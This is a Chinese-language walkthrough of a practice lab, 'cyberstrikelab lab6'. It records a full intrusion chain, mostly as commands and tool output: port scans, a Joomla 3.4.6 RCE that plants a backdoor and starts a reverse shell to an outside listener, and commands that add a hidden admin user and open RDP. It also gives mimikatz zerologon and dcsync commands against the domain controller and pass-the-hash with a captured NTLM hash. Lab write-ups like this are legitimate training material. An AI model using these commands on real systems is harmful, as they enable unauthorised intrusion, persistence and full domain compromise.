cyberstrikelab-lab6

攻防渗透
, ,

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.10.20   is alive
(icmp) Target 192.168.10.10   is alive
(icmp) Target 192.168.10.233  is alive
[*] Icmp alive hosts len is: 3
192.168.10.10:80 open
192.168.10.233:22 open
192.168.10.20:139 open
192.168.10.10:139 open
192.168.10.20:135 open
192.168.10.20:445 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.20:5985 open
192.168.10.10:5985 open
192.168.10.233:8080 open
192.168.10.233:11333 open
192.168.10.10:47001 open
192.168.10.20:47001 open
192.168.10.20:49152 open
192.168.10.20:49153 open
192.168.10.20:49155 open
192.168.10.20:49154 open
192.168.10.20:49156 open
192.168.10.20:49157 open
192.168.10.20:49158 open
192.168.10.20:49159 open
192.168.10.10:49665 open
192.168.10.10:49664 open
192.168.10.10:49666 open
192.168.10.10:49667 open
192.168.10.10:49669 open
192.168.10.10:49668 open
192.168.10.10:49670 open
[*] alive ports len is: 29
start vulscan
已完成 0/29 [-] mysql 192.168.10.10:3306 root 123456 Error 1130: Host '192.168.122.239' is not allowed to connect to this MySQL server 
[*] WebTitle http://192.168.10.233:11333 code:404 len:19     title:None
[*] NetBios 192.168.10.20   cyberweb.cyberstrikelab.com         Windows Server 2012 R2 Standard 9600
[*] WebTitle https://192.168.10.233:8080 code:404 len:19     title:None
[*] WebTitle http://192.168.10.10:47001 code:404 len:315    title:Not Found
[*] WebTitle http://192.168.10.10:5985 code:404 len:315    title:Not Found
[*] WebTitle http://192.168.10.20:47001 code:404 len:315    title:Not Found
[*] WebTitle http://192.168.10.20:5985 code:404 len:315    title:Not Found
[*] WebTitle http://192.168.10.10      code:200 len:6060   title:Home
1
2
3
4
5
6
7
8
9
10
11
12
13
14
./qscan_mac_arm64  -t 192.168.10.10/24 -p 1-65535
        
	┏┓┏┏┏┓┏┓
	┗┫┛┗┗┻┛┗

Tips: 现在-t参数可以直接输入文件路径,不用再增加file:前缀了
[+]2025/03/26 15:02:49 当前环境为:darwin, 输出编码为:utf-8
[+]2025/03/26 15:02:49 成功加载HTTP指纹:[24758]条
[+]2025/03/26 15:02:49 成功加载NMAP探针:[150]个,指纹[11916]条
[+]2025/03/26 15:02:50 Domain、IP、Port、URL、Hydra引擎已准备就绪
netbios-ns://192.168.10.20:137 netbios-ns                 ProductName:rosoftWindowsnetbios-n,OperatingSystem:Windows,Digest:"CKAAAAAAAAAAAAAAAAAAAA,Length:157,Port:137,Info:workgroup:CYBERSTRIKELA,Hostname:CYBERWEB
[*]2025/03/26 15:03:00 当前存活协程数:IP:36 个,Port:36 个,URL:0 个,Hydra:0 个
[+]2025/03/26 15:03:09 所有扫描任务已下发完毕
[+]2025/03/26 15:05:25 程序执行总时长为:[2m35.263086s]

joomla服务,去搜搜

使用joomscan扫描看看

joomla rce

发现他的版本是3.4.6存在rce去利用一波
https://github.com/kiks7/rusty_joomla_rce

1
2
3
4
5
6
7
8
python rusty_joomla_exploit.py -t http://192.168.10.10/
[*] Starting ..
[*] Target URL: http://192.168.10.10/index.php/component/users
[*] Getting Session Cookie ..
[*] Getting CSRF Token ..
[*] Sending request ..
[+] Vulnerable
[*] Use --exploit to exploit it

存在漏洞,继续利用

1
2
3
4
5
6
7
8
9
10
11
12
python rusty_joomla_exploit.py -t http://192.168.10.10/ --exploit -l 172.16.233.2 -p 1122
[*] Starting ..
[*] Target URL: http://192.168.10.10/index.php/component/users
[*] Getting Session Cookie ..
[*] Getting CSRF Token ..
[*] Sending request ..
[+] Vulnerable
[*] Getting Session Cookie ..
[*] Getting CSRF Token ..
[*] Sending request ..
[+] Backdoor implanted, eval your code at http://192.168.10.10//configuration.php in a POST with wskxtmfinqeclwthnijshsnmyjuevxwotuhsrinyhimollhxhf
[*] Now it's time to reverse, trying with a system + perl

成功rce

内网渗透

想上传 文件发现失败,添加个后门用户 rdp上去看看

1
2
3
4
net user ocean admin@123 /add
net localgroup administrators ocean /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

看看fscan扫描记录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
(icmp) Target 192.168.10.10   is alive
(icmp) Target 192.168.10.20   is alive
(icmp) Target 192.168.10.233  is alive
[*] Icmp alive hosts len is: 3
192.168.10.20:135 open
192.168.10.233:8080 open
192.168.10.20:7001 open
192.168.10.10:3306 open
192.168.10.20:445 open
192.168.10.10:445 open
192.168.10.20:139 open
192.168.10.10:139 open
192.168.10.10:135 open
192.168.10.10:80 open
192.168.10.233:22 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo
[*]192.168.10.10
   [->]WIN-P5ECGG92B08
   [->]192.168.10.10
[*] NetBios 192.168.10.20   cyberweb.cyberstrikelab.com         Windows Server 2012 R2 Standard 9600
[*] WebTitle https://192.168.10.233:8080 code:404 len:19     title:None
[*] WebTitle http://192.168.10.10      code:200 len:6060   title:Home
[*] WebTitle http://192.168.10.20:7001 code:404 len:1164   title:Error 404--Not Found
[+] InfoScan http://192.168.10.20:7001 [weblogic]

存在weblogic服务。上工具梭哈看看

存在漏洞

然后打个哥斯拉的内存马进去。

这台主机有两个ip,先在内网收一波信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
192.168.20.20:139 open
192.168.20.30:135 open
192.168.20.30:88 open
192.168.20.20:7001 open
192.168.20.30:445 open
192.168.20.30:139 open
192.168.20.20:135 open
192.168.20.30:80 open
192.168.20.20:445 open
[*] NetInfo 
[*]192.168.20.30
   [->]WIN-9DJ4TH21IE9
   [->]192.168.20.30
[*] NetBios 192.168.20.20   cyberweb.cyberstrikelab.com         Windows Server 2012 R2 Standard 9600
[*] NetBios 192.168.20.30   [+] DC:WIN-9DJ4TH21IE9.cyberstrikelab.com      Windows Server 2016 Standard 14393
[+] MS17-010 192.168.20.30	(Windows Server 2016 Standard 14393)
[*] WebTitle http://192.168.20.30      code:200 len:703    title:IIS Windows Server
[+] PocScan http://192.168.20.30 poc-yaml-active-directory-certsrv-detect 
[*] WebTitle http://192.168.20.20:7001 code:404 len:1164   title:Error 404--Not Found
[+] InfoScan http://192.168.20.20:7001 [weblogic]

可以看到扫描出一个ms17010,上msf打一下试试,搭建代理,但是又是一个样打不通,然后又果断换成zerologon打

zerologon

1
shell mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /account:WIN-9DJ4TH21IE9$ "exit"
1
shell mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /ntlm /null /account:WIN-9DJ4TH21IE9$ /exploit" "exit"
1
shell mimikatz.exe "lsadump::dcsync /csv /domain:cyberstrikelab.com /dc:WIN-9DJ4TH21IE9.cyberstrikelab.com /user:administrator /authuser:WIN-9DJ4TH21IE9$ /authpassword:\"\" /authntlm" "exit"

打pth就行了

1
proxychains4 python3 wmiexec.py -hashes :d8b3ed1de99ddc92f3cb8a5a356bb4d1 cyberstrikelab.com/administrator@192.168.20.30